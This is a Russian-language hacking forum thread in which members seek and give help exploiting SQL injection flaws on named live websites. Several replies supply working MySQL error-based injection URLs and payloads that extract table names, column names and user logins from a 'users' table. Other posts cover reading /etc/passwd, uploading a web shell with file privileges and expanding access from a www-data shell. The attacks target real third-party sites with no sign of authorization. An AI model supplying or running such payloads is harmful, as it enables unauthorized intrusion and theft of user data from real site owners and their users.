Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    Имел ввиду круглые, а не знак больше/меньше.

    BigBear, пробовал - не проходит.

    Спасибо!

    Вдогонку спрошу: какие есть популярные WAF (или модули для joomla), которые режут все спец символы, но не трогают sql операторы. Хочу покопаться в исходниках.
     
  2. Gulik

    Gulik New Member

    Joined:
    14 Mar 2007
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Приветствую,
    Помогите раскрутить иньекцию
    Code:
    http://sochi-h ome.com/objects/novostroyki.html?types=1
    На странице две запроса с инъекцией, один видимо с использованием Count(*) поэтому подобрать кол=во полей пеполучается, но есть еще MySQL error based injection method
    Через него из проги Havij получил ДБ и Таблицы
    Code:
    Current DB: urchenko_home
    
    Table found: blocks
    Table found: catalogcats
    Table found: catalogitems
    Table found: cats
    Table found: content
    Table found: forms
    Table found: formsdata
    Table found: formsfields
    Table found: general
    Table found: menu
    Table found: menus
    Table found: photos
    Table found: photositems
    Table found: poller
    Table found: poller_option
    Table found: poller_vote
    Table found: ratings
    Table found: responses
    Table found: users
    
    Но далее Havij идти не хочет и не выводит поля таблиц.
     
  3. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name=0x7573657273+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g
     
    _________________________
  4. Gulik

    Gulik New Member

    Joined:
    14 Mar 2007
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Благодарю. Но у меня опять ЧП
    Code:
    http://sochi-ho me.com/objects/novostroyki.html?types=1+and(select+1+from(select+count(*),concat((select+login+from+urchenko_home.users+limit+0,1),floor(rand(0)*2))x+from+urchenko_home.users+group+by+x)a)+--
    Выдает такое
    Subquery returns more than 1 row
     
  5. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126

    http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+count(*),concat((select+concat(mid(login,1,100))+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g
     
    _________________________
  6. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Новый серв - новый вопрос.
    Есть уязвимость site.com/1.php?id=1'
    Удалось до этого залится на сайт и получить шелл, а по нему узнать полный путь до каталога: /home/1/online/site/htdocs/ , но к сожалению шелл сразу удалили :(
    При попытке чтения '/etc/passwd' - всё ок.
    При попытке чтения '/home/1/online/site/htdocs/robots.txt' - пустое место.
    Так и должно быть? Или я где-то намудрил? :(
    И можно ли как-нибудь залить шелл? (file_priv=Y)
     
  7. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    Можно ли в FROM задать имя таблицы, с которой нужно извлечь данные - динамически?
     
  8. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    В том-то и проблема, что все папки на запись :(
     
  9. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Возможно MySQL крутится на другом сервере, а сайт на другом.
     
  10. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Да, к сожалению :(
     
  11. EksTasy

    EksTasy Member

    Joined:
    26 Oct 2008
    Messages:
    69
    Likes Received:
    6
    Reputations:
    10
    имеется сайт на opencart и доступ к такому запросу, но все не так просто как хотелось бы, у нас только изменяемая переменная product_id с нашим значением. :mad:

    Самое простое что получилось сделать, это выудить название таблиц из information_schema.
    Хотелось бы добраться до названий столбцов таблиц и самих значений.
     
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Здесь все как нельзя лучше - инъекция в select_expr. Вы не указали, какие столбцы идут на выход. Если первые идут, то эксплуатация такова:
    Должно сработать (при выводе 1, 2, 3, 4, 5 на их место подставляйте свои запросы). Если на выход идет только 6-ой столбец (555) или имеет место что-то ещё - напишите об этом, приведу соответствующую технику.
     
  13. EksTasy

    EksTasy Member

    Joined:
    26 Oct 2008
    Messages:
    69
    Likes Received:
    6
    Reputations:
    10
    видимо не хочет воспринимать знак комментария --, либо я что-то неправильно делаю.
    конструкция вида -36103 вызывает ощибку "Товар не найден!".
     
  14. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    помогите раскрутить http:// www.paid2earn.de/img/media.php?art=1'' MySQL error based
     
  15. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Чувствую я, что у вас в поиске скуля. Разделение по пробелу. Без пробела:

    5*(SELECT 1 FROM information_schema.tables WHERE 1 or 1 group by mid(version() from rand(0) for 9e9) having min(0))
    Duplicate entry 'version' for key 'group_key'

    Все стандартно.
    https://rdot.org/forum/showthread.php?t=245
    https://rdot.org/forum/showthread.php?t=503
     
    #23355 randman, 8 Jul 2014
    Last edited: 8 Jul 2014
    1 person likes this.
  16. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    спасибо ) только не могу названия таблиц вытянуть (
     
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    5*(SELECT 1 FROM information_schema.tables WHERE 1 group by concat((SELECT ifnull(TABLE_NAME,0) FROM information_schema.tables LIMIT 1), floor(rand(0)*2)) having min(0))
     
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такой вопрос, есть шелл. права www-data но консоль не работает, можно ли както залится на другие папки ? если да то в какую сторону копать?
     
  19. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    vikler, Инъекция в LIMIT после ORDER BY, MySQL >= 5.6, пока векторов нет.
     
  20. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    спасибо. не покажешь раскручено как запросить версию хотя бы и получить адекватный вывод?
     
Thread Status:
Not open for further replies.